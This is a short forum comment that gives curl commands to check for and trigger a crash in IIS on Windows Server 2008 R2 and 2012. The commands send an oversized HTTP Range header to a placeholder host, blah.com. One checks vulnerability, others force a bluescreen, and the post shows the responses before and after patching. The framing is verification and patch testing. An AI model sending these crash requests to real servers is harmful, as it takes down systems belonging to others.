|
|
|
|
|
|
by Satchelmouth
4088 days ago
|
|
|
I can confirm on Windows 2K8R2 and 2K12, with Kernel Caching enabled (as per default IIS settings) and without any Kernel Caching rules, that I can reproduce the issue using the cURL method. Steps to reproduce. Check server is vulnerable
curl -v http://blah.com/ -H "Range: bytes=00-18446744073709551615" You should see a Error 416. Force crash
curl -v http://blah.com/images/blah.jpg -H "Range: bytes=100-18446744073709551615"
--and/or--
curl -v http://blah.com/images/blah.jpg -H "Range: bytes=40-18446744073709551615" Note above: You have to specifically address a file AND use byte range 40 or 100 in my setup to make it bluescreen. After Patching - Check Vulnerability
curl -v http://blah.com/ -H "Range: bytes=00-18446744073709551615" Response: Error 400: The request has an invalid header name After Patching - Force Crash Test curl -v http://blah.com/images/blah.jpg -H "Range: bytes=100-18446744073709551615" Response: 206 Partial Content Hope that helps. |
|
|
